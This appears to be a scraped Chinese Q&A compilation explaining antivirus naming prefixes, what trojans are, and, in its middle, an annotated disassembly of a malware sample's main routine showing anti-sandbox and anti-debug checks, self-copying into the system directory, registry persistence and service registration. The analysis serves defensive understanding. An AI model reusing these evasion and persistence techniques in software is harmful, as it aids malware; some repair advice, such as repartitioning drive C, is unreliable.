本文目录一览:
关于电脑病毒的代号
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过 *** 或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞 *** 的特性。比如冲击波(阻塞 *** ),小邮差(发带毒邮件) 等。
3、木马病毒、黑客病毒
木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过 *** 或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如 *** 消息尾巴木马 Trojan. *** 3344 ,还有大家可能遇见比较多的针对 *** 游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如: *** 枭雄(Hack.Nether.Client)等。
4、脚本病毒
脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)——可不是我们的老大代码兄哦 ^_^。脚本病毒还会有如下前缀:VBS、 *** (表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒
其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀,格式是:Macro.Word97;凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀,格式是:Macro.Excel97;凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel,依此类推。该类病毒的公有特性是能感染OFFICE系列文档,然后通过OFFICE通用模板进行传播,如:著名的美丽莎(Macro.Melissa)。
6、后门病毒
后门病毒的前缀是:Backdoor。该类病毒的公有特性是通过 *** 传播,给系统开后门,给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。
7、病毒种植程序病毒
这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。
8.破坏性程序病毒
破坏性程序病毒的前缀是:Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。
10.捆绑机病毒
捆绑机病毒的前缀是:Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如 *** 、IE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑 *** (Binder. *** Pass. *** Bin)、系统杀手(Binder.killsys)等
请问这些代码是不是木马病毒?
这个代码属于木马病毒。
它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具 *** 置,往往只能望“马”兴叹。 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。 从木马的发展来看,基本上可以分为两个阶段。 最初 *** 还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的 *** 和编程知识。 而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。 所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。 什么是木马 特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。 它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具 *** 置,往往只能望“马”兴叹。 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。 从木马的发展来看,基本上可以分为两个阶段。
最初 *** 还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的 *** 和编程知识。 而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。 所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。
用杀毒软件可以清除木马。它不是一种对自己不利的“病毒”,能够应用和奴驾它的人,就将它看为是一种资源,它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 一般自己中了木马病毒,首先要认清这是个什么病毒。其实 Trojan是某些防毒软件对后门木马的一种统称,它并不代表着固定的一个,而是一类,所以即使遇到同样名字的木马可能它们也并不相同。
希望我能帮助你解疑释惑。
急呀~!这些代码是那种木马病毒?
1》troian.win32.inject.aemy
2》back door/win32.trojan
3》trojan/win32.superi
这些是病毒运行后,复制自身到系统目录下,衍生病毒文件,并删除自身。修改注册表,添加启动项,以达到随IEXPLORER.EXE进程的启动而启动的目的。helper.dll随IEXPLORER.EXE进程的启动而启动,进行劫持浏览器,键盘记录等相关病毒行为。主动连接 *** ,下载相关病毒文件信息。该病毒通过恶意网站、其它病毒/木马下载传播,可以盗取用户敏感信息。
用木马清道夫可以彻底清除!如果重装的话也可能在激活!因为它们产隐藏在C盘分区中,只有重新设置分区才行!用DOC工具箱来重新规划C盘分区!
exe病毒的代码是什么?
刚刚看到一个朋友发了一个ff.exe的病毒样本,简单分析了下,之一部分,主函数代码
004061D2 /$ 55 push ebp ; Main
004061D3 |. 8BEC mov ebp, esp
004061D5 |. 81EC 1C030000 sub esp, 31C
004061DB |. 56 push esi
004061DC |. E8 FCAEFFFF call 取当前计算机用户名
004061E1 |. E8 88AFFFFF call 检查沙箱 ; 看自己是不是在虚拟机或沙箱中运行
004061E6 |. 85C0 test eax, eax
004061E8 |. 0F85 2E010000 jnz 0040631C
004061EE |. E8 C3B1FFFF call 检查模块dbghelp.dll ; 检查自己是否被调试
004061F3 |. 84C0 test al, al
004061F5 |. 0F85 21010000 jnz 0040631C
004061FB |. FF15 B8304100 call dword ptr [kernel32.GetCurrentProc; [GetCurrentProcess
00406201 |. 8BF0 mov esi, eax
00406203 |. 56 push esi
00406204 |. E8 DDAFFFFF call 004011E6 ; 调用NativeAPI查询系统信息
00406209 |. 3C 01 cmp al, 1
0040620B |. 59 pop ecx
0040620C |. 75 08 jnz short 00406216
0040620E |. 6A 00 push 0 ; /ExitCode = 0
00406210 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
00406216 | 56 push esi ; /hObject
00406217 |. FF15 CC304100 call dword ptr [kernel32.CloseHandle] ; \CloseHandle
0040621D |. E8 63B1FFFF call 00401385 ; 反调试代码
00406222 |. 3C 01 cmp al, 1
00406224 |. 75 08 jnz short 0040622E
00406226 |. 6A 00 push 0 ; /ExitCode = 0
00406228 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
0040622E | E8 42140000 call GetAddress ; 动态获取大量API函数地址
00406233 |. 833D 98584100 00 cmp dword ptr [415898], 0
0040623A |. 74 05 je short 00406241
0040623C |. E8 2F360000 call 00409870 ; 调用大量批处理来执行dos命令
00406241 | 8365 F8 00 and dword ptr [ebp-8], 0
00406245 |. 8365 FC 00 and dword ptr [ebp-4], 0
00406249 |. 6A 02 push 2
0040624B |. C745 F0 34594100 mov dword ptr [ebp-10], 00415934 ; ASCII "lncmmmser"
00406252 |. C745 F4 46934000 mov dword ptr [ebp-C], 00409346
00406259 |. FF15 74AA4100 call dword ptr [41AA74] ; kernel32.SetErrorMode
0040625F |. BE 04010000 mov esi, 104
00406264 |. 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
0040626A |. 56 push esi ; /BufSize = 104 (260.)
0040626B |. 50 push eax ; |PathBuffer
0040626C |. 6A 00 push 0 ; |/pModule = NULL
0040626E |. FF15 F4304100 call dword ptr [kernel32.GetModuleHandl; |\GetModuleHandleA
00406274 |. 50 push eax ; |hModule
00406275 |. FF15 F8304100 call dword ptr [kernel32.GetModuleFileN; \GetModuleFileNameA
0040627B |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
00406281 |. 56 push esi ; /DestSizeMax = 104 (260.)
00406282 |. 50 push eax ; |DestString
00406283 |. 68 0C594100 push 0041590C ; |SrcString = "%windir%\system"
00406288 |. FF15 BC304100 call dword ptr [kernel32.ExpandEnvironm; \ExpandEnvironmentStringsA
0040628E |. BE 1C594100 mov esi, 0041591C ; ASCII "serivcers.exe"
00406293 |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
00406299 |. 56 push esi ; /%s = "serivcers.exe"
0040629A |. 50 push eax ; |%s
0040629B |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218] ; |
004062A1 |. 68 40624100 push 00416240 ; |format = "%s\%s"
004062A6 |. 50 push eax ; |s
004062A7 |. FF15 94314100 call dword ptr [msvcrt.sprintf] ; \sprintf
004062AD |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
004062B3 |. 56 push esi
004062B4 |. 50 push eax
004062B5 |. E8 7D3C0000 call CopySelfToSystem32 ; 复制自身到System32目录,并且替换Serivcers.exe
004062BA |. 83C4 18 add esp, 18
004062BD |. 85C0 test eax, eax
004062BF |. 74 35 je short 004062F6
004062C1 |. 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
004062C7 |. 6A 01 push 1
004062C9 |. 50 push eax
004062CA |. 68 CB5C4100 push 00415CCB ; ASCII "systemxstuff"
004062CF |. 68 CC5B4100 push 00415BCC ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions"
004062D4 |. FF35 C85B4100 push dword ptr [415BC8]
004062DA |. E8 7A2E0000 call 00409159 ; 修改关键注册表项,关联病毒为explorer打开文件夹
004062DF |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
004062E5 |. 50 push eax
004062E6 |. E8 F8300000 call 注册系统服务
004062EB |. 83C4 18 add esp, 18
004062EE |. 6A 01 push 1 ; /ExitCode = 1
004062F0 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
004062F6 | 68 24624100 push 00416224 ; ASCII "Enabled:Microsoft Enabled"
004062FB |. E8 00ADFFFF call 00401000
00406300 |. 59 pop ecx
00406301 |. 8D45 F0 lea eax, dword ptr [ebp-10]
00406304 |. 50 push eax
00406305 |. FF15 8CAA4100 call dword ptr [41AA8C] ; advapi32.StartServiceCtrlDispatcherA
0040630B |. 85C0 test eax, eax
0040630D |. 75 0D jnz short 0040631C
0040630F |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
00406315 |. 50 push eax
00406316 |. E8 C8300000 call 注册系统服务
0040631B |. 59 pop ecx
0040631C | 33C0 xor eax, eax
0040631E |. 5E pop esi
0040631F |. C9 leave
00406320 \. C2 1000 retn 10
木马病毒是什么?
是一种电脑病毒。
木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。
简介
计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。
木马程序表面上是无害的,甚至对没有警戒的用户还颇有吸引力,它们经常隐藏在游戏或图形软件中,但它们却隐藏着恶意。这些表面上看似友善的程序运行后,就会进行一些非法的行动,如删除文件或对硬盘格式化。